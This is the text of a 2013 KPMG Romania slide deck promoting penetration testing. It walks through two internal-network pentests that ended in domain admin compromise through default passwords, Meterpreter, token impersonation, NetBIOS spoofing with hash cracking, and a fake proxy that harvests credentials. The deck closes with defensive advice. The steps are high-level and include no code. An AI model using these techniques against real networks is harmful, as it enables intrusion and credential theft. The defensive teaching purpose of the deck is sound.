Penetration Penetrati on Testing Testing - a tool for improving our cyber security
Adrian Furtuna Ph.D. CEH KPMG Management Consulting IT Advisory
Cyber Security – Security – A Mutual Challenge Embassy of Sweden 12th March 2013
Agenda
Who am I
Why this topic
Case study 1
Case study 2
Lessons learned
Conclusions
Q&A
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
2
Who am I
Member of the Pentest Team Team in KPMG Romania
Our motto: “ Hacking through complexity ”
Doing pentests against various applications and systems:
Internet Banking applications
General web applications
Mobile applications
Internal networks, public networks
Wireless networks
Social engineering, etc
Speaker at Hacktivity, Hacktivity, DefCamp, Hacknet and other local security confs
Teaching assistant at Information Security Master programs (UPB, MTA and ASE)
Teaching penetration testing classes cl asses
Organizing Capture the Flag contests
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
3
Why this topic?
The need for more efficient cyber security
Penetration testing is part of the defense-indepth approach
Verify the effectiveness of defense mechanisms and people
Find weak spots in defense layers
Show the real risk of a vulnerability
Suggest corrective measures
Re-verify
Is my data safe?
Penetration testing can be used for improving our cyber security
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
4
Case Study 1
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
5
Pentesting the internal network (2011)
Objective: See what an internal malicious user could do, given simple network physical access.
■ Malicious user:
visitor, contractor, contractor, malicious employee
■ Targets:
confidential data, client information, strategic business plans, etc
■ Initial access:
physical network port in users subnet
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
6
Pentesting the internal network (2011) – cont.
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
7
Pentesting the internal network (2011) – cont. 1. Netwo worrk ma mapping ■
IP ranges
■
Host names
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
8
Pentesting the internal network (2011) – cont. 1. Netwo worrk ma mapping ■
IP ranges
■
Host names
2. Se Serv rvic ice e an and d OS di disc scov over ery y ■
Windows 7
■
Windows 2008 Server R2
■
Common client ports open
■
IIS, MsSQL, Exchange, etc
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
9
Pentesting the internal network (2011) – cont. 1. Netwo worrk ma mapping ■
IP ranges
■
Host names
2. Se Serv rvic ice e an and d OS di disc scov over ery y ■
Windows 7
■
Windows 2008 Server R2
■
Common client ports open
■
IIS, MsSQL, Exchange, etc
3. Vul ulne nera rabi bili lity ty sc scan anni ning ng ■
Nessus: 1 high, high, 30 medium, 39 low
■
MsSQL server default password for sa user
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
10
Pentesting the internal network (2011) – cont. 4. Expl plo oitation
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
11
Pentesting the internal network (2011) – cont. 4. Expl plo oitation ■ Add local admin
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
12
Pentesting the internal network (2011) – cont. 4. Expl plo oitation ■ Add local admin 5. Po Post st-e -exp xplo loit ita ati tion on ■
Info gathering
■
Credentials to other systems
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
13
Pentesting the internal network (2011) – cont. 4. Expl plo oitation ■ Add local admin 5. Po Post st-e -exp xplo loit ita ati tion on ■
Info gathering
■
Credentials to other systems
6. Pivoting ■
Connect to 2 nd db server
■
Upload Meterpreter
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
14
Pentesting the internal network (2011) – cont. 4. Expl plo oitation ■ Add local admin 5. Po Post st-e -exp xplo loit ita ati tion on ■
Info gathering
■
Credentials to other systems
6. Pivoting ■
Connect to 2 nd db server
■
Upload Meterpreter
7. Po Post st-e -exp xplo loit ita ati tion on ■
List tokens
■
Impersonate Domain Admin token
■
Create Domain Admin user
■
Game Over
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
15
Pentesting the internal network (2011) – cont. Game over
on Domain Controller:
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
16
Case Study 2
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
17
Pentesting the (same) internal network (2012)
Objective: See what an internal malicious user could do, given simple network access. Test the findings from previous year
■ Malicious user:
visitor, contractor, contractor, malicious employee
■ Targets:
confidential data, client information, strategic business plans, etc
■ Initial access:
network port in users subnet
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
18
Pentesting the (same) internal network (2012) – cont. 1. Netwo worrk ma mapping ■
~ the same as last year
2. Se Serv rvic ice e an and d OS di disc scov over ery y ■
~ the same as last year
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
19
Pentesting the (same) internal network (2012) – cont. 1. Netwo worrk ma mapping ■
~ the same as last year
2. Se Serv rvic ice e an and d OS di disc scov over ery y ■
~ the same as last year
3. Vul ulne nera rabi bili lity ty sc scan anni ning ng ■
Nessus: 0 high, 21 medium, 30 low
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
20
Pentesting the (same) internal network (2012) – cont. 1. Netwo worrk ma mapping ■
~ the same as last year
2. Se Serv rvic ice e an and d OS di disc scov over ery y ■
~ the same as last year
3. Vul ulne nera rabi bili lity ty sc scan anni ning ng ■
Nessus: 0 high, 21 medium, 30 low
Now what?
■
No default/weak passwords
■
No missing patches
■
No exploitable config problems
■
No sql injection….
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
21
Pentesting the (same) internal network (2012) – cont. 4. Att tta ack th the e cl clie ient nts s – method 1
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
22
Pentesting the (same) internal network (2012) – cont. 4. Att tta ack th the e cl clie ient nts s – method 1 ■
Setup a fake local NetBIOS server
■
Respond to every request with my IP address
■
Setup multiple local services (HTTP, (HTTP, SMB)
■
Request Windows authentication on connection => capture password hashes
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
23
Pentesting the (same) internal network (2012) – cont. 4. Att tta ack th the e cl clie ient nts s – method 1 – cont. ■
Captured around NTLM 50 hashes
■
Cracked about 25% using dictionary attack with mangling rules in a few hours
■
Gained network access as domain user (low privileges)
■
Could access some shared files on file server
■
Not enough
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
24
Pentesting the (same) internal network (2012) – cont. 4. Att tta ack th the e cl clie ient nts s – method 2 ■
Man in the middle attack between victim and proxy server
■
Setup a fake local proxy server
■
Request Basic authentication
■
Receive user’s credentials in clear text (base64 encoded)
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
25
Pentesting the (same) internal network (2012) – cont. 4. Att tta ack th the e cl clie ient nts s – method 2 – cont The victim sees this:
What would you do?
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
26
Pentesting the (same) internal network (2012) – cont. 5. Expl plo oitation ■
Got local admin password (global) from a special user
■
Could connect as admin on any workstation
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
27
Pentesting the (same) internal network (2012) – cont. 5. Expl plo oitation ■
Got local admin password (global)
■
Could connect as admin on any workstation
6. Pivoting ■
Search the machines from IT subnet for interesting credentials / tokens
■
Found a process running as a domain admin user
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
28
Pentesting the (same) internal network (2012) – cont. 5. Expl plo oitation ■
Got local admin password (global)
■
Could connect as admin on any workstation
6. Pivoting ■
Search the machines from IT subnet for interesting credentials / tokens
■
Found a process running as a domain admin user
7. Expl plo oitation ■
Impersonate domain admin
■
Create new domain admin user
■
Game over
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
29
Lessons learned
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
30
Pentest comparison
2011
2012
Low hanging fruits removed
no
yes
IT personnel vigilance
low
high
Network prepared for pentest
no
yes
Existing vulnerabilities
yes
yes (lower nr)
medium
high
Overall exploitation difficulty
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
31
Consultant’s advice
■ Make yourself periodic vulnerability assessments (e.g. Nessus scans) ■ Prepare your network before a pentest (you should always be prepared, btw) ■ An homogeneous network network is easier to defend then an heterogeneous heterogeneous one ■ Do not allow local admin rights for regular users ■ Patch, patch, patch ■ Educate users for security risks
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
32
Conclusions
Penetration testing can be used for improving our cyber security
Do it periodically with specialized people
Mandatory for new applications / systems before putting in production
Vulnerability Vulnerabil ity assessment is not penetration testing
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
33
Q&A
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
34
Thank Than k You You Adrian Furtunǎ, PhD, CEH Security Consultant, KPMG Romania IT Advisory, Management Consulting +40 747 333 008
[email protected]
© 2013 KPMG Romania, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative (“KPMG International”), a Swiss entity All rights reserved The information contained herein is of a general nature and is not intended to address the circumstances of any particular individual or entity Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future No one should act on such information without appropriate professional advice after a thorough examination of the particular situation